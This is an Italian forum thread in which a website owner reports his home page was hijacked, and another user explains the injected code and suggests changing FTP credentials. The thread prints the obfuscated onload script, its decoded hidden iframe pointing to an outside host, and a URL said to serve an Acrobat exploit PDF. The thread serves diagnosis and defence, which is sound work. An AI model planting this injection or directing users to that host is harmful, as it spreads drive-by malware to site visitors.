mi hanno modificato il sito!!

[wangaz78]

ciao a tutti,
sentite cosa mi è successo:
apro la home del mio sito ed al posto della solita pagina mi si apre un link ad un file pdf

http://www.chanchoi.cn/cache/doc.pdf
[attenzione, il link contiene un exploit per acrobat reader!]

la cosa mi ha insospettito molto... e sono andato a controllare il mio file index.html.
Qualcuno deve averlo modificato (e in che modo vorrei proprio saperlo) e ci ha scritto dentro questo codice:

<body onload="function a2(s){b='';for(i=0;i<s.length;i+=4>>1)b+=s.charAt( i);return b;}document.write(a2('\074u\x64n\151k\x76n\040o\x7 3w\164n\x79 \154o\x65b\075f\x22u\166s\x69c\163a\x69t\142i\x69o \154n\x69u\164n\x79k\072n\x68o\151w\x64n\144 \x65o\156b\x22f\076u\x3cs\151c\x66a\162t\x61i\155o \x65n\040u\x73n\162k\x63n\075o\x22w\150n\x74 \164o\x70b\072f\x2fu\057s\x63c\150a\x61t\156i\x63o \150n\x6fu\151n\x2ek\143n\x6eo\057w\x69n\156 \x64o\145b\x78f\056u\x70s\150c\x70a\042t\x20i\166o \x69n\163u\x69n\142k\x69n\154o\x69w\164n\x79 \072o\x68b\151f\x64u\144s\x65c\156a\x20t\167i\x69o \144n\x74u\150n\x3dk\061n\x30o\060w\x20n\150 \x65o\151b\x67f\150u\x74s\075c\x38a\060t\x3ei\074o \x2fn\151u\x66n\162k\x61n\155o\x65w\076n\x3c \057o\x64b\151f\x76u\076s'));">

ma che cos'è?
e soprattutto come posso difendermi da inconvenienti di questo tipo?
grazie mille!

prevenire è meglio che curare! ^_^

[Habanero]

Ho reso non cliccabile il link perchè il pdf in questione contiene un exploit che cerca di sfruttare una vulnerabilità di acrobat reader (non vulnerabile solo dalla versione 8.1.2 e successivi) per eseguire codice sulla macchima.

Lo script nel tuo sito scrive nella pagina il seguente codice:

codice:

<div style="visibility:hidden">
<iframe src="http://chanchoi.cn/index.php" visibility:hidden width=100 height=80></iframe>
</div>

Un iframe nascosto che carica la pagina che poi esegue materialmente il download del pdf.

Dovresti cercare di capire come è stata possibile l'iniezione nella tua home page per evitare che questo succeda nuovamente..

[wangaz78]

Originariamente inviato da Habanero
Ho reso non cliccabile il link perchè il pdf in questione contiene un exploit che cerca di sfruttare una vulnerabilità di acrobat reader (non vulnerabile solo dalla versione 8.1.2 e successivi) per eseguire codice sulla macchima.

Lo script nel tuo sito scrive nella pagina il seguente codice:

codice:

<div style="visibility:hidden">
<iframe src="http://chanchoi.cn/index.php" visibility:hidden width=100 height=80></iframe>
</div>

Un iframe nascosto che carica la pagina che poi esegue materialmente il download del pdf.

Dovresti cercare di capire come è stata possibile l'iniezione nella tua home page per evitare che questo succeda nuovamente..

E appunto!! Quello che non capisco è proprio questo! Come è possibile che qualcuno abbia potuto modificare la homepage?
Dove potrebbe stare la causa? C'è qualcosa che non va nel sito o è un problema del server su cui è ospitato?
Io accedo via ftp per caricare i files e la password è abbastanza sicura... è quella che mi è stata assegnatadi default e che non ho mai modificato.. anzi non se nemmeno se si può modificare...Non saprei proprio da che parte indagare per scoprire...
Sul pannello di controllo del dominio non ho fatto alcuna modifica, unica novità è che di recente ho chiesto l'attivazione del supporto php per mettere un form di invio mail. Che sia legato in qualche modo a questo? Forse è colpa del form in php?

Ah dimenticavo.. chiedo scusa per aver messo un link nocivo... non era mia intenzione creare danni! Anzi, putroppo io ho scaricato ed aperto il pdf e apparentemenete non è successo nulla (almeno spero...)
Ma che genere di scherzetto è? Mi sono preso un virus e non me ne sono accorto?
E' una cosa che accade spesso ai siti web o è una condizione anomala? Scusate l'ignoranza e l'inesperienza e grazie per l'aiuto.

[Habanero]

le cause dell'iniezione dello script nel tuo sito possono essere varie... ad esempio

-script vulnerabile nel sito.. (ad esempio uno script php)
-furto delle credenziali di accesso FTP. Ad esempio ad opera di malware installato sul pc del gestore del sito
-vulnerabilità del server (responsabilità dell'hoster... più raro dei precedenti)

Se ti va prova a darmi l'inidirizzo del sito via pvt.

[wangaz78]

Grazie per le risposte, in effetti non so proprio che pesci pigliare...

stavo giusto dando un'occhiata qui
http://blog.html.it/28/08/2006/il-pr...ers-injections
mi rendo conto di essere proprio ignorante in materia...Ho fatto anche il classico errore di aver preso un form preconfezionato da internet...(senza capirci dentro granchè)
Ma stranamentte l'attacco è avvenuto prima che caricassi sul sito lo script in php. Lo script l'ho caricato ieri sera e dopo aver sistemato la homepage già infetta!
Il php invece mi è stato attivato da più tempo, forse un mese. Fino a ieri la pagina per l'invio mail reindirizzava su uno spazio free di altervista dove php era già attivo in attesa che lo attivassero anche sul mio dominio.

Ti mando il link al sito..e se vuoi ti mostro anche il codice del php.

grazie ancora per la pazienza!

[Habanero]

l'email header injection (quella del post da te linkato sul blog) non permette la modifica di pagine del sito ma solo di veicolare email a destinatari diversi da quello stabilito dal programmatore.

[wangaz78]

Originariamente inviato da Habanero
l'email header injection (quella del post da te linkato sul blog) non permette la modifica di pagine del sito ma solo di veicolare email a destinatari diversi da quello stabilito dal programmatore.

ops sto facendo un po' di confusione..

[Habanero]

Ho analizzato sito e script e non mi sembra ci siano i presupposti per ritenere che siano vulnerabili.

Per prima cosa provvederei a cambiare la password di accesso allo spazio FTP e mi sincererei di farlo da un pc "pulito", privo di malware.

[wangaz78]

grazie per l'analisi dello script, mi preoccupava abbastanza. tra l'altro uso lo stesso script su un altro sito su altervista e continuo a ricevere spam! ma se mi dici che secondo te è a posto mi sento più tranquillo. (forse è colpa di altervista?? boh sarebbe interessante indagare anche su questo ...)

intanto seguo il tuo consiglio, sto facendo una scansione con antivir che rileva delle minacce del tipo "HEUR/HTML.Malware" con questa descrizione:

Virus: HEUR/HTML.Malware
Type: AHeAD Heuristic special detection
In the wild: No
Reported Infections: Low
Distribution Potential: Low
Damage Potential: Low
Static file: No

potrebbe essere questo la causa del mio problema con il sito? Ho usato spesso questo pc per uploadare i files via ftp... Oddio ...

[emmebì]

Originariamente inviato da Habanero
l'email header injection (quella del post da te linkato sul blog) non permette la modifica di pagine del sito ma solo di veicolare email a destinatari diversi da quello stabilito dal programmatore.

Esattamente, e vorrei aggiungere che ho personalmente provato ad eseguirne alcune: sulle ultime versioni di PHP5 (cui è stata aggiunta la Suhisin patch) non sono più fattibili le iniezioni di header MIME.
Almeno non quelle più standard.